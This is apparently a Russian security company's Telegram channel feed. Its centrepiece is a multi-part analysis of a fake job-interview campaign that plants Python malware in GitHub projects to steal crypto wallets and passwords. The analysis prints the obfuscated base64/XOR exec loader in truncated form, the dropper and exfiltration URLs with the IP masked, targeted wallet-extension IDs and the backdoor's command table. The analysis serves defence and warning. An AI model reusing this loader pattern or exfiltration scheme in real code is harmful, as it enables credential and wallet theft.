Рекриптор
228 subscribers
88 photos
12 videos
3 files
263 links
Заметки на полях о практической безопасности и не только
Download Telegram
В сентябре вышла бумажная версия журнала Journal of Computer Virology and Hacking Techniques с моей статьёй про подход к созданию быстрых систем асимметричного шифрования с использованием white-box-криптографии: https://link.springer.com/article/10.1007/s11416-023-00511-z

Исходники шифра доступны здесь: https://github.com/dmschelkunov/wb_poc

В целом выпуск интересный и посвящён российским исследованиям: https://link.springer.com/journal/11416/volumes-and-issues/20-3

Никак не доходят руки переписать генератор случайных чисел на RC4OK (https://ia.cr/2023/1486)
и адаптировать исходники под Linux, но планы такие есть

#криптография #whitebox
👍7
Мошенники становятся изобретательнее.

В Linkedin общаются с соискателями на технические должности, в качестве тестовых заданий просят склонировать проект на Python из репозитория, запустить, сделать скриншоты. В общем, имитация технического собеседования. В одном из файлов содержится замаскированный имплант (по сути, dropper), при запуске которого происходит выкачка из сети других скриптов с разным интересным функционалом: поиск криптокошельков, кэшей браузеров и т.п. с последующей отправкой найденного на удалённый ресурс, reverse shell с интересной реализацией сетевого обмена, попытка поставить anydesk для удалённого администрирования и получения полного контроля над машиной жертвы. Всё написано на Python и ориентировано на Linux-пользователей.
Подробности опишем позже, там много интересного с технической точки зрения.

IP-адрес мошеннического ресурса: 147.124.197.138. Обратите внимание. И будьте внимательны и осторожны. Фишинг нацеливается и на профессиональных разработчиков тоже.

Большое спасибо основателю Emercoin Олегу Ховайко, который, проведя первичный анализ кода в репозитории, обнаружил имплант и поделился с нами этой информацией.

#offensive #фишинг #vrprotect
👍10
Мне кажется, это очень хорошо. Кто надо российские продукты всё равно протестирует и уязвимости, которые впоследствии будут проэксплуатированы, найдёт. При этом те в России, кто мог бы их обнаружить раньше (а бывают совсем "детские" ошибки), российские продукты не глядят, опасаясь преследования. Надеюсь, ситуация выправится
👍4
«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 1. Имплант

Не так давно мы анонсировали исследование на эту тему. Как и обещали, делимся результатами. Публиковать статью где-либо долго, поэтому мы решили тезисно и по частям опубликовать результаты этого исследования здесь - в нашем канале. Отметим, что на момент публикации все репозитории и ссылки живые. Здесь приводим не всё, но схема понятна

Итак, вечером 21 октября с нами связался наш коллега — основатель блокчейн-платформы Emercoin Олег Ховайко. Олег обнаружил интересную фишинговую активность в социальной сети Linkedin и решил поделиться с нами этой информацией, а также результатами своих первоначальных исследований.

Сама фишинговая схема, хоть и является довольно свежей, не оригинальна и описана, например, здесь и здесь. В случае, обнаруженном Олегом, мошенники мимикрировали под работодателя, разыскивающего специалистов по блокчейн-технологиям. Мошенники в процессе «собеседования», которое проходит, конечно же, онлайн, предлагают скачать проект из репозитория, запустить код, сделать скриншоты. Вот один из таких репозиториев, на который любезно указал нам Олег. Будьте внимательны с этим репозиторием и не запускайте этот код у себя, если у вас нет достаточных знаний и опыта! Интерес представляет файл pypay/libra.py. В нём находится имплант следующего вида:
zg="tGlmYksYLGExQeQcSNC4jDU0GNFNjbBgzBDQbHCs4GDNFfhEfMC5gRUM9DhA2ITceCCoYWwYTLgEd...
exec("from base64 import b64decode;d1=b64decode(zg[9:]);sk=zg[1:9];sl=len(d1);mq=''\
    for l0 in range(sl):k=l0&7;w=chr(d1[l0]^ord(sk[k]));mq+=w\nexec(mq)")

Имплант пытались «скрыть» за большим числом символов табуляции, чтобы уменьшить вероятность случайного обнаружения при беглом анализе кода. Дальнейшее исследование проводилось уже непосредственно нашей командой.

Сам имплант представляет собой, как видно на листинге выше, Base64-строку довольно большого размера, после которой следует код её декодирования с последующим нехитрым расшифрованием с помощью xor. В результате получается код следующего вида:
_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
exec((_)(b'=UsIfc9D+//vPz/r3TQOhAC8tx55A6ktxAvPff96J/J9+PyH1kQX5VQfR/lyANmVNWHseBJQ6...

Эта лямбда-функция декодирует подаваемую на вход строку, предварительно проинвертировав её. После первой итерации декодирования получим такой результат:
exec((_)(b’{новая строка base64…}))

И так много десятков раз :) В конечном итоге после многократного декодирования мы получим нагрузку — dropper, который получает управление, скачивает файл с адреса http://<XXX.XXX.XXX.XXX>:1245/m/NVRlYW05, сохраняет по пути {домашний каталог пользователя}/.vscode/m2 и запускает его.

Продолжение следует...

#offensive #malware #фишинг #blockchain
🔥12
«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 2. Доступ к криптокошелькам

В предыдущем посте мы стартовали серию микростатей на тему фишинга среди блокчейн-инженеров. Продолжим погружение. Ранее мы писали, что вредоносный имплант скачивает файл с адреса http://<XXX.XXX.XXX.XXX>:1245/m/NVRlYW05, сохраняет по пути {домашний каталог пользователя}/.vscode/m2 и запускает его.

m2
В файле m2 используется кодирование, аналогичное описанному ранее. Вообще во всех исследованных нами скриптах обфускация выглядит одинаково. m2 – это stealer, который делает следующее:
• по адресу http://<XXX.XXX.XXX.XXX>:1245/keys отправляет пакет со следующим содержимым: {текущее время, тип нагрузки (в нашем случае значение 'NVRlYW05'), имя компьютера, 'ojq', '4C2' + текущая рабочая директория};
• подключается к http://<XXX.XXX.XXX.XXX>:1245/client/NVRlYW05, скачивает файл в {домашний каталог пользователя}/.vscode/client и запускает его;
• ходит по папкам браузеров Chrome, Opera, Brave и ищет папки расширений криптокошельков, все найденные файлы из этих папок отправляет на сервер http://<XXX.XXX.XXX.XXX>:1245/bin;
• если на компьютере установлена Windows, отправляются файлы расширений криптокошельков браузера Microsoft Edge;
• если установлена MacOS, отправляются файлы из папки /Library/Keychains/login.keychain, сохраненные пароли браузеров Brave, Chrome;
• если установлена Linux, то оправляются файлы из папки /.local/share/keyrings/, а также сохраненные пароли браузеров Chrome, Firefox

Папки расширений криптокошельков приведены на листинге ниже:
Locals = [
    'nkbihfbeogaeaoehlefnkodbefgpgknn', # metamask2
    'ibnejdfjmmkpcnlpebklmnkoeoihofec', # Tron
    'ejbalbakoplchlghecdalmeeeajnimhm', # Metamask2
    'fhbohimaelbohpjbbldcngcnapndodjp', # BNB Chain Wallet
    'bfnaelmomeimhlpmgjnjophhpkkoljpa', # Phantom
    'hnfanknocfeofbddgcijnmhnfnkdnaad', # Coinbase Wallet extension
    'fnjhmkhhmkbjkkabndcnnogagogbneec', # Ronin Wallet
    'aeachknmefphepccionboohckonoeemg', # Coin98 Wallet
    'hifafgmccdpekplomjjkcfgodnhcellj'  # Crypto.com | Wallet Extension
]


client

client – это dropper (практически аналогичный libra.py), который скачивает два файла. Первый файл загружается с http://<XXX.XXX.XXX.XXX>:1244/payload/NVRlYW05 и сохраняется в рабочей директории как .vscode/pay. Второй - c http://<XXX.XXX.XXX.XXX>:1244/bow/NVRlYW05 и сохраняется как .vscode/bow (при условии, что компьютер управляется ОС Linux или Windows).

pay

Файл pay скачивается закодированным по тому же принципу, что и файлы выше. При запуске он:
• собирает информацию о компьютере: uuid, система, релиз системы, версия системы, название компьютера, уникальный идентификатор;
• с помощью сервиса http://ip-api.com/json получает информацию о сетевом подключении: страна, город, широта, долгота, ip, внутренний ip, временная зона и т.д;.
• всю эту информацию отправляет по адресу http://<XXX.XXX.XXX.XXX>:1244/keys;
• инициирует подключение через raw sockets к XXX.XXX.XXX.XXX по 1245 порту и ждет от сервера команд вида {‘code’: value, ‘args’: value}.

code может иметь значения от 1 до 9:
A.cmds = {1:A.ssh_obj,2:A.ssh_cmd,3:A.ssh_clip,4:A.ssh_run,5:A.ssh_upload,6:A.ssh_kill,7:A.ssh_any,8:A.ssh_env,9:A.ssh_zcp}

Каждое такое значение обозначает функцию, которую необходимо вызвать с аргументом args

Т.е. pay является полноценным бэкдором с достаточно широким функционалом, описание которого представим в самом скором времени.

Продолжение следует...

#offensive #malware #фишинг #blockchain
🔥10
«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 3. Бэкдор, RAT и при чём тут Telegram

Как мы говорили выше, описание атаки продолжим довольно скоро. Продолжаем. В этой части разберём возможности устанавливаемого в систему бэкдора pay, список команд которого приведён в предыдущем посте, а также дальнейшую вредоносную активность.

Ниже приведено детально описание команд бэкдора pay:
ssh_obj – исполняет команды, полученные от сервера (по сути, выполняет полученную строку через subprocess.Popen(…) с аргументом shell = True). Таким образом можно выполнить практически любое действие в системе жертвы. Крайне полезно для закрепления, повышения привилегий и дальнейшего продвижения.
ssh_cmd – если args == delete, то удаляет данный файл после закрытия соединения (других аргументов в коде скрипта обнаружено не было).
ssh_clip – отправляет на сервер содержимое глобальной переменной e_buf (о ней расскажем чуть позже).
ssh_run – скачивает c http://<XXX.XXX.XXX.XXX>:1244/brow/NVRlYW05 в ~/.n2/bow и запускает его.
ssh_upload – в зависимости от переданного аргумента может загружать папки, файлы, искать определенные файлы и папки и загружать их.
ssh_kill – завершает процессы браузеров Brave и Chrome.
ssh_any – скачивает нагрузку с http://<XXX.XXX.XXX.XXX>:1244/adc/NVRlYW05 в ~/.n2/adc и запускает её.
ssh_env – в аргументе приходят данные для подключения к FTP-серверу. Если компьютер работает под управлением Windows, происходит отправка файлов из папок ~/Documents и ~/Downloads. В противном случае отправляются файлы из папок ~/home ~/Volumes.
ssh_zcp – создает временную папку, в которую копирует файлы из расширений браузеров, которые являются криптокошельками. Список весьма внушительный, публиковать его здесь мы не будем. Просто поверьте, что там много. Значительно больше, чем в листинге из предыдущего поста. В эту же папку копируются файлы клиентских криптокошельков:
app_win_array={r"%LocalAppData%\\1Password":"1pass",r"%AppData%\\Exodus":"exodus",
                   r"%AppData%\\atomic":"atomic",r"%AppData%\\Electrum":"electrum",
                   r"%AppData%\\WinAuth":"winauth",
                   r"%AppData%\\Proxifier4\\Profiles":"proxifier4",
                   r"%AppData%\\Dashlane":"dashlane"}app_osx_array={m_base_p+"Exodus":"exodus",m_base_p+"atomic":"atomic"}
app_linux_array={l_conf_p+"Exodus":"exodus",l_conf_p+"atomic":"atomic"}


После этого временная папка сжимается и отправляется Telegram-боту, токен от которого был получен в аргументе к команде (работа через Telegram набирает популярность). Если отправка боту завершилась с ошибкой, происходит загрузка на FTP сервер.
Если система работает под управлением Windows, будет запущен keylogger, результаты которого будут записываться в глобальную переменную e_buf, содержимое которой, в свою очередь, будет отправлено на сервер при вызове функции ssh_clip, о которой шла речь выше.

По сути, бэкдор позволяет на время своей работы получить контроль над системой с теми же возможностями, что и текущий пользователь.

Но это ещё не всё. Ведь у нас осталось ещё два скрипта: bow и adc

bow

Скрипт bow пытается дешифровать логин и пароль из популярных браузеров (Chrome, Opera, Brave, Yandex, Microsoft Edge) и отправить их на http://<XXX.XXX.XXX.XXX>:1244/keys

adc

Если компьютер находится под управлением Windows, скрипт пытается обратиться к http://<XXX.XXX.XXX.XXX>:1244/any , скачать Anydesk.exe (утилита для удалённого администрирования системы) и установить его. После этого в конфигурационный файл прописываются свои данные. Если же компьютер находится под управлением Linux, скрипт пытается найти уже установленный Anydesk и дописывает в файл конфигурации свои данные. Таким образом на системе жертвы устанавливается полноценный RAT (Remote Access Trojan) с широчайшими возможностями для любых дальнейших действий.

Выводы... А выводы будут чуть позже

#offensive #malware #фишинг #blockchain
🔥8👍3
«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 4. Заключение

В этом посте попытаемся обобщить результаты анализа фишинговой активности и вредоносных нагрузок (см. часть 1, часть 2 и часть 3).

Первый вопрос, который всплывает в голове: единственный ли это репозиторий, который используется мошенниками? К сожалению, нет. Вот пример ещё одного репозитория, где имплант находится в файле public/Marketing/imgs/fb-logo.png . Этот файл, несмотря на вводящее в опасное заблуждение расширение, является обфусцированным js-скриптом, который обращается к папкам расширений криптокошельков браузеров (Chrome, Opera, Brave, Firefox, Microsoft Edge), собирает оттуда файлы и отправляет их по адресу http://XXX.XXX.XXX.XXX:1224/uploads. Также этот скрипт загружает файл client с адреса http://XXX.XXX.XXX.XXX:1224/client/10/106. Если машина управляется Windows, дополнительно скачивается архив pi2.zip с адреса http://XXX.XXX.XXX.XXX:1224/pdown. В архиве находятся python-скрипты с названиями, функционалом и методами обфускации, сходными с описанными выше. Это говорит нам об одном авторстве вредоносных нагрузок. Разница, по сути, только в имплантах.

Качество фишинговых атак возрастает. Сайты компаний и объявления сделаны довольно качественно, репозитории с кодом размещены на популярных площадках. Сами импланты и их обфускация заслуживают отдельного внимания. Импланты размещены «глубоко в коде» - в файлах, расположенных «не на виду», которые при беглом взгляде кажутся совершенно не важными, чтобы заострять на них внимание. Обфускация и шифрование имплантов призваны затруднить декодирование вредоносной нагрузки. Незаинтересованный человек, даже если увидит имплант, скорее всего просто не станет дальше копать и прекратит общение с мошенниками, потому что декодирование нагрузки требует некоторого времени и немного поскриптовать. В декодированных вредоносных скриптах адреса удалённых ресурсов не присутствуют в явном виде, а собираются из закодированных строк. Всё вышесказанное намекает на противодействие в том числе и автоматизированному анализу.

Специалисты по блокчейн выбраны в качестве жертв неслучайно, т.к. вероятность, что на их устройствах будут криптокошельки, существенно выше, чем в других случаях. Впрочем, нагрузки достаточно универсальны, довольно неплохо сделаны и могут использоваться не только для атак на блокчейн-инженеров. Кражей кошельков дело не ограничивается - мошенники пытаются получить доступ к другой чувствительной информации: логины с паролями, содержимое буфера обмена. Также запускается backdoor, что позволяет злоумышленникам осуществлять широкий спектр действий на компьютере жертвы. В этот момент злоумышленники знают о системе жертвы практически всё, что позволяет им работать целенаправленно, повышая свою эффективность. Запуск Anydesk в роли RAT усугубляет проблему и позволяет мошенникам оперировать компьютером жертвы практически как своим собственным.

Загрузка данных Telegram-боту выглядит интересно. Технология не так уж и нова, но довольно удобна и эффективна, поэтому набирает популярность и встречается всё чаще. Даже в корпоративных инфраструктурах блокировка Telegram – не столь частое явление, а зачастую Telegram – это полноценный рабочий инструмент в том числе и в больших компаниях. Десктопные клиенты мессенджеров в корпоративной инфраструктуре встречаются нередко, а значит, такой трафик не вызовет подозрений на периметре. Т.е., если соискатель проходит «собеседование» на рабочем месте в компании, то, учитывая внушительные возможности устанавливаемого злоумышленниками инструментария, вероятность компрометации всей корпоративной инфраструктуры крайне высока.

Число вредоносов на некомпилируемых языках (типа Python) растёт. Это позволяет атаковать широкий спектр систем, базирующихся на Windows, Linux, MacOS.

#offensive #malware #blockchain
🔥6👍1🤯1
Для тех, кто интересуется фаззингом, свеженькая презентация доклада Advanced Fuzzing With LibAFL с Ekoparty 2024: https://docs.google.com/presentation/d/1ILXdsBx6JJbsf3uq-_hSeYux-a0DRRPxebOY65EDE5o/

#реверсинг #почитать #фаззинг
👍3
В Калужской Бауманке прошла Неделя Безопасника.

Небольшая конференция, соревнования CTF, мастер-классы. Были рады поучаствовать: помочь с ресурсами, провести мастер-класс по реверсингу. Соревнования CTF, учитывая,что участвовали младшие курсы, прошли, на наш взгляд, вполне достойно. Крайне радует инициативность студентов, которые организовали эти соревнования. Ребята, вы большие молодцы! Продолжайте в том же духе, а мы вам, конечно, поможем! Далее будем сотрудничать с Бауманкой ещё активнее, у заинтересованных сторон есть желание и ресурсы. Ну а незаинтересованных мы попросту не возьмём в эту лодку ;)

Обещал список интересных, на мой взгляд, работ и ссылок про ИИ в области ИБ. Их на самом деле довольно много, но вот то, что, на мой взгляд, самое вкусное:

Защита

Winter, P., Lampesberger, H., Zeilinger, M., Hermann, E. (2011). On Detecting Abrupt Changes in Network Entropy Time Series. In: De Decker, B., Lapon, J., Naessens, V., Uhl, A. (eds) Communications and Multimedia Security. CMS 2011. Lecture Notes in Computer Science, vol 7025. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-642-24712-5_18

Jaafer Al-Saraireh, Ala' Masarweh, A novel approach for detecting advanced persistent threats, Egyptian Informatics Journal, Volume 23, Issue 4, 2022, Pages 45-55, ISSN 1110-8665, https://doi.org/10.1016/j.eij.2022.06.005

Do Xuan, C. . (2021). Detecting APT Attacks Based on Network Traffic Using Machine Learning. Journal of Web Engineering, 20(1), 171–190. https://doi.org/10.13052/jwe1540-9589.2019

Hasan, M.M., Islam, M.U. & Uddin, J. Advanced Persistent Threat Identification with Boosting and Explainable AI. SN COMPUT. SCI. 4, 271 (2023). https://doi.org/10.1007/s42979-023-01744-x

Щелкунова Н.В, Щелкунов Д.А, О статическом анализе исполняемых файлов на содержание вредоносного кода, РусКрипто-2024 https://ruscrypto.ru/resource/archive/rc2024/files/06_shelkunov_shelkunova.pdf

Cylance Data Team, Introduction to Artificial Intelligence for Security Professionals
Sharma, Sanjay & Challa, Rama & Sahay, Sanjay. (2019). Detection of Advanced Malware by Machine Learning Techniques. 10.48550/arXiv.1903.02966.

Bensaoud, Ahmed & Abudawaood, Nawaf & Kalita, Jugal. (2020). Classifying Malware Images with Convolutional Neural Network Models. 10.48550/arXiv.2010.16108.

Rhode, Matilda & Burnap, Pete & Jones, Kevin. (2017). Early Stage Malware Prediction Using Recurrent Neural Networks. Computers & Security. 77. 10.1016/j.cose.2018.05.010.

Chaoxian Wei, Qiang Li, Dong Guo, Xiangyu Meng, Toward Identifying APT Malware through API System Calls, Security and Communication Networks, vol. 2021, Article ID 8077220, 14 pages, 2021. https://doi.org/10.1155/2021/8077220

S. M. Milajerdi, R. Gjomemo, B. Eshete, R. Sekar, and V. Venkatakrishnan, “Holmes: Real-time apt detection through correlation of suspicious information flows,” in Symposium on Security and Privacy. IEEE, 2019.

M. Barre, A. Gehani, and V. Yegneswaran, “Mining data provenance to detect advanced persistent threats,” in 11th International Workshop on Theory and Practice of Provenance (TaPP), 2019

Xueyuan Han, Thomas F. J.-M. Pasquier, Adam Bates, James Mickens, Margo I. Seltzer, Unicorn: Runtime Provenance-Based Detector for Advanced Persistent Threats. NDSS, 2020, doi:10.14722/ndss.2020.2

Нападение

https://github.com/TheR1D/shell_gpt

https://github.com/aress31/burpgpt

https://github.com/protectai/vulnhuntr

Hilario, E., Azam, S., Sundaram, J. et al. Generative AI for pentesting: the good, the bad, the ugly. Int. J. Inf. Secur. 23, 2075–2097 (2024). https://doi.org/10.1007/s10207-024-00835-x

Happe, Andreas & Cito, Jürgen. (2023). Getting pwn'd by AI: Penetration Testing with Large Language Models. 10.48550/arXiv.2308.00121.

Richard Fang, Rohan Bindu, Akul Gupta, Qiusi Zhan, Daniel Kang. Teams of LLM Agents can Exploit Zero-Day Vulnerabilities. https://doi.org/10.48550/arXiv.2406.01637


#почитать #ии #offensive #антивирус
👍11
Про аналоговую "криптографию" и зачем нужно скремблирование сигнала

Что делать, если сигнал аналоговый и его нужно как-то пошифровать? Казалось бы, ответ на поверхности: АЦП - шифратор - ЦАП. Есть надёжные блочные и поточные шифры. Их много, выбирай на вкус. Такие удивительные инженерные решения действительно встречаются не так уж редко. Стоят каких-то денег. Зачастую денег не таких уж и маленьких, ибо компоненты, обвязка и программирование дороги.

Интересно вот что: инженеры, создающие такие устройства, как и те, кто ставит им такие удивительные задачи, перед тем как погрузиться в эту занимательную работу, понимают, почему сигнал изначально аналоговый? Если да, то тут всё понятно. Если нет, то ... надо что-то делать с университетской базой. Ключевым преимуществом аналоговых систем является расстояние в совокупности с ценой. Что такое помеха в аналоговом телевидении? Это вы будете видеть картинку с помехами (ну там будет немного снега, волны могут пойти небольшие), понимая при этом, что на ней. Неприятно, но можно работать. Что такое помеха в цифровом телевидении? Кубики и регулярная пропажа изображения. При неустойчивом приёме цифрового сигнала теряются пакеты. Все с этим сталкивались так или иначе - телевидение то у всех сейчас цифровое. Эту проблему пытаются победить помехоустойчивым кодированием, которое тоже требует ресурсов и не является панацеей: мы добавляем в пакет проверочные биты, тем самым удлиняя его, а число ошибок, которые код может исправить, невелико. Чем больше ошибок может исправить код, тем больше избыточность и тем выше вероятность нахватать ещё ошибок.

Что мы имеем, когда втыкаем АЦП - шифрование - ЦАП в полностью аналоговую систему, скажем, перед модулятором? Мы сводим ключевое преимущество аналоговой передачи контента (большое расстояние при небольшой цене) на нет. Если шифр блочный в режиме ECB, то плохо, ибо лавинный эффект (изменение одного бита шифротекста приведёт к совершенно другому тексту при расшифровке). Если поточный, то не особо лучше, ибо костыли с синхронизацией состояний ГПСЧ, которые крутятся на передатчике и приёмнике. Короче, городить протоколы поверх. А, ну и временной лаг, ибо все эти математические операции требуют ресурсов, как и АЦП с ЦАП-ом. Полсекунды запросто.

А как воткнуть хоть какое-то шифрование в полностью аналоговую систему, чтобы и качество не ухудшилось, и задержек почти не было, и ценник был небольшим? Есть такая штука: скремблирование. Это изменение непосредственно самого аналогового сигнала без его "оцифровки". Тут много подходов, начиная с простого фазового инвертора на одном транзисторе, заканчивая, например, вот такими вещами с использованием теории Хаоса для генерации маскирующего сигнала: https://ieeexplore.ieee.org/document/5174046

#криптография #скремблер
👍4
Малварь под Linux эволюционирует, а злоумышленники серьёзно нацеливаются на Linux -системы. Интенсивно растёт как число вредоносов, так и их качество и технологичность. Совершенствуются и технологии защиты от обнаружения. Для сокрытия вредоносной активности часто используются руткиты. Вот хороший пример: https://xakep.ru/2024/12/17/pumakit/
В общем, всё ещё используемый иногда тезис "у меня Linux, поэтому я никому не нужен" безнадёжно устарел. Анализа логов тоже недостаточно. Нужна полноценная endpoint-защита

#malware #антивирус
👍4
Ни убавить - ни прибавить. Всяких телеграмов тоже касается
Заодно передаю пламенный привет всем участникам ежегодной акции «сдай ЦРУ всех известных тебе сотрудников ФСБ с помощью мессенджера WhatsApp». Никак вы, блядь, не научитесь 😩
This media is not supported in your browser
VIEW IN TELEGRAM
Никуда не скроешься от цепкого электронного взгляда нашего Ковальски :)
По сравнению с более ранними версиями алгоритмы и модели стали гораздо быстрее и качественнее. Объект (в данном случае я) обнаруживается, классифицируется, сопровождается. Модель под капотом данной версии умеет классифицировать несколько объектов одновременно. Всё это работает на одноплатнике ценой около 6 т.р.

#видеоаналитика #ии #ковальски #робототехника
👍2🔥2
Долго думал, что написать в новогоднем посте нашего уютного корпоративного бложика. За год столько всего произошло, что одного поста будет мало. Потому решил кратко: мы серьёзно подросли, выполнили все планы, стартовали ряд новых направлений. Ковальски подтверждает. В Новом Году желаем всем здоровья, успехов, благополучия и всех благ!
👍5
Пока каникулы, прочитал Обработка естественного языка в действии
Неплохое введение в NLP (Natural Language Processing). Из плюсов: довольно свежий обзор используемого мат. аппарата и алгоритмов за исключением, пожалуй, трансформеров и больших языковых моделей.
Из минусов: перевод так себе.
Не знаю, отнести это к плюсам или минусам: подробного описания алгоритмов и подходов нет, отражена только суть. Подробности нужно гуглить. К прочтению однозначно рекомендую хотя бы для расширения кругозора

#почитать
Хороший блог с хорошими статьями по анализу малвари: https://exploitreversing.com/

#почитать #реверсинг
👍1
Давно ожидаемое в том числе и нами набирает обороты. В отрасли ИБ тоже. Дальше будет веселее. Уже сейчас некоторые модели неплохо справляются в том числе с задачами реверсинга и поиска уязвимостей. Всё, что можно автоматизировать, будет автоматизировано. Как в нападении, так и в защите. Тем, кто учится на ИБ-специальностях сейчас, нужно учитывать этот долгий тренд и уметь как работать с моделями, так и понимать в общих чертах, что там под капотом. Хорошо, что мы давно делаем ставку на автоматизацию и ИИ: развиваем и усиливаем нашу команду ИИ, разрабатываем и внедряем новые модели.

Выше публиковали список интересных работ про ИИ в области ИБ. Не лишним будет напомнить.

#ии
👍3
Мошенническая активность

Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том числе и от хорошо знакомых людей или родственников. Если пользователь установит его на свой смартфон, то злоумышленники смогут получать, читать, отправлять СМС-сообщения, получат доступ к контактам, смогут совершать звонки по мобильной связи. Это приведёт к краже аккаунтов, доступу к банковским счетам жертвы.

Расскажите близким людям, что, если вложение требует установки чего-то, а на устройстве появляются предупреждающие сообщения, как на скриншоте, то это вредоносная активность и устанавливать ничего не нужно.

Подробный анализ будет позже.
IP-адрес командного центра вредоносного приложения: 89.23.102.250
Общение с ним осуществляется по протоколу WebSocket

#offensive #malware #фишинг
👍3😱1🤨1